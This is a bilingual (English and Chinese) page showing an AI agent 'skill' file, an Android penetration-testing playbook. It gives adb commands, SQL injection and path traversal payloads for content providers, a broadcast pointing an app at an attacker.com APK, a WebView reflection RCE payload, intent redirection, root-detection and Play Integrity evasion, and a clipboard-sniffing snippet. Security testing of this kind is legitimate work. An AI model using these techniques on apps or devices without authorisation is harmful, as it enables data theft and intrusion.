Back to Details

android-pentesting-tricks

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

SKILL: Android Pentesting Tricks — Expert Attack Playbook

SKILL: Android渗透测试技巧 —— 专家攻击手册

AI LOAD INSTRUCTION: Expert Android application security testing techniques. Covers SSL pinning bypass (Frida/Objection/LSPosed), component exposure, WebView exploitation, intent redirection, root detection bypass, and Play Integrity evasion. Base models miss Frida hook specifics and multi-layer bypass chains.
AI加载说明:专业Android应用安全测试技术,涵盖SSL pinning绕过(Frida/Objection/LSPosed)、组件暴露、WebView漏洞利用、Intent重定向、root检测绕过和Play Integrity规避。基础模型缺少Frida钩子的具体实现和多层绕过链路相关知识。

0. RELATED ROUTING

0. 相关跳转路由

Before going deep, consider loading:
  • mobile-ssl-pinning-bypass for in-depth cross-platform SSL pinning bypass techniques and framework-specific hooks
  • ios-pentesting-tricks when also testing the iOS version of the same app
  • api-sec for backend API security testing once traffic is intercepted
在深入学习前,可加载以下内容:
  • mobile-ssl-pinning-bypass 了解深度跨平台SSL pinning绕过技术和特定框架的钩子实现
  • ios-pentesting-tricks 若同时测试同一应用的iOS版本可查看
  • api-sec 用于拦截流量后进行后端API安全测试

Advanced Reference

高级参考资料

Also load FRIDA_SCRIPTS.md when you need:
  • Ready-to-use Frida script templates for common Android testing tasks
  • Detailed hook points for OkHttp, Retrofit, Volley, WebView
  • Root detection bypass script collection
需要以下内容时可加载 FRIDA_SCRIPTS.md
  • 常见Android测试任务的开箱即用Frida脚本模板
  • OkHttp、Retrofit、Volley、WebView的详细钩子点位
  • Root检测绕过脚本合集

1. SSL PINNING BYPASS

1. SSL PINNING绕过

1.1 Frida Universal Bypass

1.1 Frida通用绕过

bash
undefined
bash
undefined

Install Frida server on device

在设备上安装Frida server

adb push frida-server-16.x.x-android-arm64 /data/local/tmp/ adb shell "chmod 755 /data/local/tmp/frida-server-16.x.x-android-arm64" adb shell "/data/local/tmp/frida-server-16.x.x-android-arm64 &"
adb push frida-server-16.x.x-android-arm64 /data/local/tmp/ adb shell "chmod 755 /data/local/tmp/frida-server-16.x.x-android-arm64" adb shell "/data/local/tmp/frida-server-16.x.x-android-arm64 &"

Universal SSL pinning bypass

通用SSL pinning绕过

frida -U -l ssl_pinning_bypass.js -f com.target.app --no-pause

| Hook Point | Library/Class | Coverage |
|---|---|---|
| `X509TrustManager.checkServerTrusted` | Android SDK | All standard HTTPS |
| `OkHttpClient.Builder.sslSocketFactory` | OkHttp 3.x/4.x | Square OkHttp |
| `CertificatePinner.check` | OkHttp 3.x/4.x | OkHttp pinning |
| `HttpsURLConnection.setSSLSocketFactory` | Android SDK | Legacy HTTPS |
| `SSLContext.init` | Android SDK | Custom SSL contexts |
| `WebViewClient.onReceivedSslError` | WebView | WebView SSL errors |
| `TrustManagerFactory.getTrustManagers` | Android SDK | Factory-created TMs |
frida -U -l ssl_pinning_bypass.js -f com.target.app --no-pause

| 钩子点 | 库/类 | 覆盖范围 |
|---|---|---|
| `X509TrustManager.checkServerTrusted` | Android SDK | 所有标准HTTPS |
| `OkHttpClient.Builder.sslSocketFactory` | OkHttp 3.x/4.x | Square OkHttp |
| `CertificatePinner.check` | OkHttp 3.x/4.x | OkHttp证书锁定 |
| `HttpsURLConnection.setSSLSocketFactory` | Android SDK | 旧版HTTPS |
| `SSLContext.init` | Android SDK | 自定义SSL上下文 |
| `WebViewClient.onReceivedSslError` | WebView | WebView SSL错误 |
| `TrustManagerFactory.getTrustManagers` | Android SDK | 工厂创建的信任管理器 |

1.2 Objection (Quick Method)

1.2 Objection(快速方法)

bash
objection -g com.target.app explore
bash
objection -g com.target.app explore

Inside Objection REPL:

在Objection REPL中执行:

android sslpinning disable
undefined
android sslpinning disable
undefined

1.3 Network Security Config (Debug Builds)

1.3 网络安全配置(调试版本)

If you can modify the APK or it's a debug build:
xml
<!-- res/xml/network_security_config.xml -->
<network-security-config>
  <debug-overrides>
    <trust-anchors>
      <certificates src="user" />  <!-- Trust user-installed CAs -->
    </trust-anchors>
  </debug-overrides>
</network-security-config>
如果你可以修改APK或者这是调试版本:
xml
<!-- res/xml/network_security_config.xml -->
<network-security-config>
  <debug-overrides>
    <trust-anchors>
      <certificates src="user" />  <!-- 信任用户安装的CA证书 -->
    </trust-anchors>
  </debug-overrides>
</network-security-config>

1.4 Magisk Module Approach

1.4 Magisk模块方案

ModuleMethodScope
LSPosed + TrustMeAlreadyHooks system-wide TrustManagerAll apps
LSPosed + SSLUnpinningTargeted SSL bypassPer-app
MagiskTrustUserCertsMoves user CA to system storeAll apps trusting system CAs
ConscryptTrustUserCertsPatches ConscryptNewer Android (7+)
模块方法作用范围
LSPosed + TrustMeAlready全局钩子系统信任管理器所有应用
LSPosed + SSLUnpinning定向SSL绕过单应用
MagiskTrustUserCerts将用户CA证书移动到系统证书库所有信任系统CA的应用
ConscryptTrustUserCerts补丁Conscrypt新版Android(7+)

2. COMPONENT EXPOSURE

2. 组件暴露

2.1 Exported Activities

2.1 导出的Activity

bash
undefined
bash
undefined

Find exported activities (AndroidManifest.xml or aapt)

查找导出的Activity(通过AndroidManifest.xml或aapt)

aapt dump xmltree target.apk AndroidManifest.xml | grep -B 5 "exported.*true"
aapt dump xmltree target.apk AndroidManifest.xml | grep -B 5 "exported.*true"

Launch exported activity directly

直接启动导出的Activity

adb shell am start -n com.target.app/.AdminActivity adb shell am start -n com.target.app/.DeepLinkActivity
-d "target://callback?token=attacker_token"
adb shell am start -n com.target.app/.AdminActivity adb shell am start -n com.target.app/.DeepLinkActivity
-d "target://callback?token=attacker_token"

With extra data

携带额外数据

adb shell am start -n com.target.app/.TransferActivity
--es "amount" "99999" --es "recipient" "attacker"
undefined
adb shell am start -n com.target.app/.TransferActivity
--es "amount" "99999" --es "recipient" "attacker"
undefined

2.2 Content Providers

2.2 内容提供者(Content Provider)

bash
undefined
bash
undefined

Query exposed content providers

查询暴露的内容提供者

adb shell content query --uri content://com.target.app.provider/users
adb shell content query --uri content://com.target.app.provider/users

SQL injection in content provider

内容提供者的SQL注入

adb shell content query --uri "content://com.target.app.provider/users"
--where "1=1) UNION SELECT sql,2,3 FROM sqlite_master--"
adb shell content query --uri "content://com.target.app.provider/users"
--where "1=1) UNION SELECT sql,2,3 FROM sqlite_master--"

Path traversal in file-providing content provider

提供文件服务的内容提供者的路径遍历

adb shell content read --uri "content://com.target.app.fileprovider/../../../../etc/hosts"

| Provider Type | Attack Vector | Impact |
|---|---|---|
| Database-backed | SQL injection via `query()` projection/selection | Data leak, auth bypass |
| File-backed | Path traversal via URI | Read arbitrary files |
| Parcelable | Type confusion in custom Parcelable | Code execution |
adb shell content read --uri "content://com.target.app.fileprovider/../../../../etc/hosts"

| 提供者类型 | 攻击向量 | 影响 |
|---|---|---|
| 数据库-backed | 通过`query()`的投影/选择参数进行SQL注入 | 数据泄露、权限绕过 |
| 文件-backed | 通过URI进行路径遍历 | 读取任意文件 |
| Parcelable | 自定义Parcelable中的类型混淆 | 代码执行 |

2.3 Broadcast Receivers

2.3 广播接收器(Broadcast Receiver)

bash
undefined
bash
undefined

Send crafted broadcast

发送构造的广播

adb shell am broadcast -a com.target.app.ACTION_UPDATE
--es "url" "http://attacker.com/malicious.apk"
adb shell am broadcast -a com.target.app.ACTION_UPDATE
--es "url" "http://attacker.com/malicious.apk"

Ordered broadcast interception (higher priority receiver intercepts first)

有序广播拦截(优先级更高的接收器会先拦截)

Register receiver with higher priority than target to intercept/modify data

注册比目标优先级更高的接收器来拦截/修改数据

undefined
undefined

2.4 Exported Services

2.4 导出的服务(Service)

bash
undefined
bash
undefined

Start/bind to exported service

启动/绑定导出的服务

adb shell am startservice -n com.target.app/.BackgroundService
--es "command" "exfiltrate"
adb shell am startservice -n com.target.app/.BackgroundService
--es "command" "exfiltrate"

List running services

列出运行中的服务

adb shell dumpsys activity services | grep com.target

---
adb shell dumpsys activity services | grep com.target

---

3. WEBVIEW VULNERABILITIES

3. WEBVIEW漏洞

3.1 JavaScript Interface RCE (Pre-API 17)

3.1 JavaScript接口远程代码执行(API 17之前)

java
// Vulnerable code: addJavascriptInterface without @JavascriptInterface annotation
webView.addJavascriptInterface(new JSInterface(), "android");

// Pre-API 17: Reflection-based RCE via injected JavaScript
// Inject into WebView:
// android.getClass().forName('java.lang.Runtime')
//   .getMethod('getRuntime').invoke(null).exec('id')
java
// 存在漏洞的代码:addJavascriptInterface未添加@JavascriptInterface注解
webView.addJavascriptInterface(new JSInterface(), "android");

// API 17之前:通过注入的JavaScript基于反射实现RCE
// 注入到WebView中的代码:
// android.getClass().forName('java.lang.Runtime')
//   .getMethod('getRuntime').invoke(null).exec('id')

3.2 Modern WebView Attacks

3.2 现代WebView攻击

VulnerabilityConditionExploit
setJavaScriptEnabled(true)
+ untrusted content		JS enabled + attacker controls loaded URLXSS → bridge access
setAllowFileAccessFromFileURLs(true)
file:// can read other file://Load 
file:///data/data/com.target/...
setAllowUniversalAccessFromFileURLs(true)
file:// can access any originExfiltrate via XHR to attacker
loadUrl(user_controlled)
User input in loadUrljavascript: scheme or file://
shouldOverrideUrlLoading
bypass		Incomplete URL validationRedirect to attacker-controlled page
evaluateJavascript
with tainted data		User data in JS executionXSS in WebView context
漏洞触发条件利用方式
setJavaScriptEnabled(true)
+ 不可信内容		JS开启 + 攻击者控制加载的URLXSS → 桥接访问
setAllowFileAccessFromFileURLs(true)
file://协议可以读取其他file://资源加载
file:///data/data/com.target/...
setAllowUniversalAccessFromFileURLs(true)
file://协议可以访问任意源通过XHR将数据外传到攻击者服务器
loadUrl(user_controlled)
loadUrl中存在用户输入执行javascript:协议或加载file://资源
shouldOverrideUrlLoading
绕过		URL验证不完整跳转到攻击者控制的页面
evaluateJavascript
携带污染数据		JS执行中存在用户数据WebView上下文中的XSS

3.3 Deep Link to WebView Chain

3.3 深度链接到WebView的攻击链

1. Attacker crafts deep link: target://webview?url=https://attacker.com/xss.html
2. App opens WebView with attacker URL
3. XSS in WebView calls JavaScript bridge: android.sensitiveMethod()
4. Bridge executes in app context with app's permissions
1. 攻击者构造深度链接: target://webview?url=https://attacker.com/xss.html
2. 应用打开WebView加载攻击者的URL
3. WebView中的XSS调用JavaScript桥接: android.sensitiveMethod()
4. 桥接在应用上下文执行,拥有应用的所有权限

4. INTENT REDIRECTION

4. INTENT重定向

Exported activity receives an Intent and starts another (internal) activity using data from the received Intent.
java
// Vulnerable pattern:
Intent received = getIntent();
Intent redirect = (Intent) received.getParcelableExtra("next_intent");
startActivity(redirect);
// Attacker controls "next_intent" → can start any internal activity
bash
undefined
导出的Activity接收到Intent后,使用接收到的Intent中的数据启动另一个内部Activity。
java
// 存在漏洞的写法:
Intent received = getIntent();
Intent redirect = (Intent) received.getParcelableExtra("next_intent");
startActivity(redirect);
// 攻击者可以控制"next_intent" → 可以启动任意内部Activity
bash
undefined

Exploit: start non-exported internal activity via redirection

利用方式:通过重定向启动未导出的内部Activity

adb shell am start -n com.target.app/.ExportedActivity
--es "next_intent" "intent:#Intent;component=com.target.app/.InternalAdminActivity;end"

| Pattern | Indicator | Risk |
|---|---|---|
| `getParcelableExtra` → `startActivity` | Intent-in-Intent | Start non-exported activities |
| `getStringExtra("url")` → `startActivity(Intent.ACTION_VIEW)` | URL forwarding | Open arbitrary URLs |
| `getStringExtra("class")` → `Class.forName` → `startActivity` | Dynamic class loading | Start any activity by name |

---
adb shell am start -n com.target.app/.ExportedActivity
--es "next_intent" "intent:#Intent;component=com.target.app/.InternalAdminActivity;end"

| 模式 | 特征 | 风险 |
|---|---|---|
| `getParcelableExtra` → `startActivity` | Intent嵌套Intent | 启动未导出的Activity |
| `getStringExtra("url")` → `startActivity(Intent.ACTION_VIEW)` | URL转发 | 打开任意URL |
| `getStringExtra("class")` → `Class.forName` → `startActivity` | 动态类加载 | 按名称启动任意Activity |

---

5. ROOT DETECTION BYPASS

5. ROOT检测绕过

5.1 Common Root Detection Checks

5.1 常见Root检测检查项

CheckWhat It DetectsFrida Bypass
su
binary exists
/system/xbin/su
, 
/sbin/su
Hook 
File.exists()
→ return false
Build tags contain "test-keys"
Build.TAGS
Hook 
Build.TAGS
→ return "release-keys"
Magisk Manager installedPackage name checkHook 
PackageManager.getPackageInfo
Superuser.apk presentSu management appHook 
File.exists()
RootBeer libraryMulti-check root detectionHook all RootBeer check methods
SafetyNet/Play IntegrityServer-side attestationRequires Magisk DenyList + module
Abnormal system properties
ro.debuggable=1
, etc.		Hook 
SystemProperties.get
检查项检测内容Frida绕过方式
su
二进制文件存在
/system/xbin/su
/sbin/su
钩子
File.exists()
→ 返回false
Build标签包含"test-keys"
Build.TAGS
钩子
Build.TAGS
→ 返回"release-keys"
安装了Magisk Manager包名检查钩子
PackageManager.getPackageInfo
存在Superuser.apkSu管理应用钩子
File.exists()
RootBeer库多重Root检测钩子所有RootBeer检查方法
SafetyNet/Play Integrity服务端认证需要Magisk DenyList + 模块
异常系统属性
ro.debuggable=1
钩子
SystemProperties.get

5.2 Magisk DenyList (Previously MagiskHide)

5.2 Magisk DenyList(原MagiskHide)

bash
undefined
bash
undefined

Enable DenyList in Magisk Manager

在Magisk Manager中开启DenyList

Add target app to DenyList — Magisk hides itself from that app

将目标应用添加到DenyList —— Magisk会对该应用隐藏自身存在

Covers: su binary, Magisk Manager package, mount points, props

覆盖检测项:su二进制文件、Magisk Manager包名、挂载点、系统属性


---

---

6. PLAY INTEGRITY / SAFETYNET BYPASS

6. PLAY INTEGRITY / SAFETYNET绕过

LevelWhat It ChecksBypass Difficulty
Basic IntegrityNot rooted, not emulatorEasy (Magisk + DenyList)
Device IntegrityBootloader locked, verified bootHard (requires locked bootloader)
Strong IntegrityHardware-backed attestationVery hard (hardware TEE)
Techniques:
  • Magisk with Zygisk enabled + DenyList for target app
  • Play Integrity Fix (PIF) Magisk module: spoofs device fingerprint
  • Shamiko module: hides root from specific apps
  • Custom ROM with locked bootloader (Pixel-specific tricks)
级别检查内容绕过难度
基础完整性未Root、不是模拟器简单(Magisk + DenyList)
设备完整性Bootloader锁定、已验证启动困难(需要锁定Bootloader)
强完整性硬件级认证极难(硬件TEE)
绕过技术:
  • 开启Zygisk的Magisk + 目标应用添加到DenyList
  • Play Integrity Fix (PIF) Magisk模块:伪造设备指纹
  • Shamiko模块:对特定应用隐藏Root
  • 带锁定Bootloader的自定义ROM(Pixel专属技巧)

7. TAPJACKING (OVERLAY ATTACKS)

7. 点击劫持(覆盖层攻击)

xml
<!-- Malicious overlay activity -->
<activity android:name=".OverlayActivity"
    android:theme="@style/TransparentTheme"
    android:excludeFromRecents="true">
</activity>

<!-- Requires SYSTEM_ALERT_WINDOW permission (draw over other apps) -->
Android VersionProtectionBypass
Pre-6.0NoneFull overlay
6.0–11
filterTouchesWhenObscured
(opt-in)		Apps not using it are vulnerable
12+Untrusted touches blocked for overlay windowsPartial overlays, timing-based
xml
<!-- 恶意覆盖层Activity -->
<activity android:name=".OverlayActivity"
    android:theme="@style/TransparentTheme"
    android:excludeFromRecents="true">
</activity>

<!-- 需要SYSTEM_ALERT_WINDOW权限(在其他应用上层显示) -->
Android版本防护措施绕过方式
6.0之前完全覆盖
6.0–11
filterTouchesWhenObscured
(需主动开启)		未开启该配置的应用存在漏洞
12+覆盖层窗口的非信任触摸被拦截部分覆盖、基于时间的攻击

8. BACKUP EXTRACTION

8. 备份提取

bash
undefined
bash
undefined

Check if backup allowed

检查是否允许备份

aapt dump xmltree target.apk AndroidManifest.xml | grep allowBackup
aapt dump xmltree target.apk AndroidManifest.xml | grep allowBackup

android:allowBackup(0x01010280)=(type 0x12)0xffffffff → true (default!)

android:allowBackup(0x01010280)=(type 0x12)0xffffffff → true(默认开启!)

Extract backup

提取备份

adb backup -f backup.ab -apk com.target.app
adb backup -f backup.ab -apk com.target.app

Convert to tar

转换为tar格式

dd if=backup.ab bs=24 skip=1 | openssl zlib -d > backup.tar tar xf backup.tar
dd if=backup.ab bs=24 skip=1 | openssl zlib -d > backup.tar tar xf backup.tar

Analyze extracted data

分析提取的数据

find com.target.app -name ".db" -o -name ".xml" -o -name "*.json"
find com.target.app -name ".db" -o -name ".xml" -o -name "*.json"

Check shared_prefs/ for tokens, credentials

检查shared_prefs/目录下的令牌、凭证

Check databases/ for SQLite DBs with sensitive data

检查databases/目录下包含敏感数据的SQLite数据库


---

---

9. ADDITIONAL TRICKS

9. 额外技巧

9.1 Debuggable App Exploitation

9.1 可调试应用利用

bash
undefined
bash
undefined

If android:debuggable="true" in manifest

如果manifest中配置了android:debuggable="true"

adb shell run-as com.target.app
adb shell run-as com.target.app

Now running as the app's user — full data directory access

现在以应用用户身份运行 —— 拥有数据目录的完全访问权限

cat /data/data/com.target.app/shared_prefs/*.xml
undefined
cat /data/data/com.target.app/shared_prefs/*.xml
undefined

9.2 Drozer (Component Testing Framework)

9.2 Drozer(组件测试框架)

bash
undefined
bash
undefined

List attack surface

列出攻击面

dz> run app.package.attacksurface com.target.app
dz> run app.package.attacksurface com.target.app

Exported Activities: 3

导出的Activities: 3

Exported Services: 1

导出的Services: 1

Exported Providers: 2

导出的Providers: 2

Query provider

查询提供者

dz> run app.provider.query content://com.target.app.provider/users
dz> run app.provider.query content://com.target.app.provider/users

Scan for injection

扫描注入漏洞

dz> run scanner.provider.injection -a com.target.app
undefined
dz> run scanner.provider.injection -a com.target.app
undefined

9.3 Clipboard Sniffing

9.3 剪贴板嗅探

java
// Pre-Android 10: any app can read clipboard
ClipboardManager cm = (ClipboardManager) getSystemService(CLIPBOARD_SERVICE);
cm.addPrimaryClipChangedListener(() -> {
    ClipData data = cm.getPrimaryClip();
    // Exfiltrate copied passwords, tokens, etc.
});
java
// Android 10之前:任意应用都可以读取剪贴板
ClipboardManager cm = (ClipboardManager) getSystemService(CLIPBOARD_SERVICE);
cm.addPrimaryClipChangedListener(() -> {
    ClipData data = cm.getPrimaryClip();
    // 外传复制的密码、令牌等数据
});

10. ANDROID PENTESTING DECISION TREE

10. ANDROID渗透测试决策树

Testing Android application
├── Can intercept HTTPS traffic?
│   ├── No → SSL pinning in place
│   │   ├── Frida available? → universal SSL bypass script (§1.1)
│   │   ├── Rooted + Magisk? → LSPosed + TrustMeAlready (§1.4)
│   │   ├── Debug build? → Network Security Config (§1.3)
│   │   └── None above? → manual decompile + patch + repackage
│   └── Yes → proceed to traffic analysis
├── Exported components found?
│   ├── Exported Activities → test direct launch, deeplink abuse (§2.1)
│   ├── Content Providers → SQLi, path traversal (§2.2)
│   ├── Broadcast Receivers → crafted intent injection (§2.3)
│   └── Services → unauthorized service binding (§2.4)
├── WebView present?
│   ├── JavaScript enabled + JS interface? → bridge exploitation (§3.1)
│   ├── File access enabled? → file:// scheme abuse (§3.2)
│   └── Deep link → WebView? → URL injection chain (§3.3)
├── Intent handling found?
│   └── Intent-in-Intent pattern? → redirect to internal activity (§4)
├── Root detection blocking testing?
│   ├── Client-side checks only? → Frida hook bypass (§5.1)
│   ├── SafetyNet/Play Integrity? → Magisk DenyList + modules (§6)
│   └── Custom obfuscated checks? → reverse engineer + targeted hooks
├── Sensitive data storage?
│   ├── allowBackup=true? → ADB backup extraction (§8)
│   ├── Debuggable? → run-as for direct data access (§9.1)
│   └── SharedPreferences → check for plaintext tokens/credentials
└── UI-based attacks applicable?
    └── Overlay possible? → tapjacking (§7)
测试Android应用
├── 可以拦截HTTPS流量?
│   ├── 否 → 存在SSL证书锁定
│   │   ├── 可以使用Frida? → 通用SSL绕过脚本(§1.1)
│   │   ├── 已Root + 安装Magisk? → LSPosed + TrustMeAlready(§1.4)
│   │   ├── 是调试版本? → 修改网络安全配置(§1.3)
│   │   └── 以上都不满足? → 手动反编译 + 补丁 + 重打包
│   └── 是 → 继续进行流量分析
├── 发现导出组件?
│   ├── 导出的Activities → 测试直接启动、深度链接滥用(§2.1)
│   ├── 内容提供者 → SQL注入、路径遍历(§2.2)
│   ├── 广播接收器 → 构造Intent注入(§2.3)
│   └── 服务 → 未授权服务绑定(§2.4)
├── 存在WebView?
│   ├── 开启JavaScript + JS接口? → 桥接利用(§3.1)
│   ├── 开启文件访问? → file://协议滥用(§3.2)
│   └── 深度链接跳转到WebView? → URL注入攻击链(§3.3)
├── 存在Intent处理逻辑?
│   └── Intent嵌套Intent模式? → 重定向到内部Activity(§4)
├── Root检测阻止测试?
│   ├── 仅客户端检查? → Frida钩子绕过(§5.1)
│   ├── SafetyNet/Play Integrity检测? → Magisk DenyList + 模块(§6)
│   └── 自定义混淆检查? → 逆向工程 + 定向钩子
├── 存在敏感数据存储?
│   ├── allowBackup=true? → ADB备份提取(§8)
│   ├── 可调试? → run-as直接访问数据(§9.1)
│   └── SharedPreferences → 检查明文存储的令牌/凭证
└── 适用UI层面攻击?
    └── 可以添加覆盖层? → 点击劫持(§7)